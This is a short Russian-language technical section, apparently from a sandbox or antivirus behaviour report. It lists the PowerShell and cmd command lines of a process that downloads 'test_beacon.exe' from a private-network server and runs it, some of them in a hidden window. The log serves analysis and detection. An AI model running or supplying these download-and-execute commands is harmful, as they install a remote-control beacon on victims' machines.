Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wget http://10.#0.10.10:8000/test_beacon.exe -o C:\Users\mrtom\Downloads\tool\beacon.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' cmd.exe /c C:\Users\mrtom\Downloads\tool\beacon.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wget http://10.#0.10.10:8000/test_beacon.exe -o C:\Users\mrtom\Downloads\tool\beacon.exe' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' cmd.exe /c C:\Users\mrtom\Downloads\tool\beacon.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c C:\Users\mrtom\Downloads\tool\beacon.exe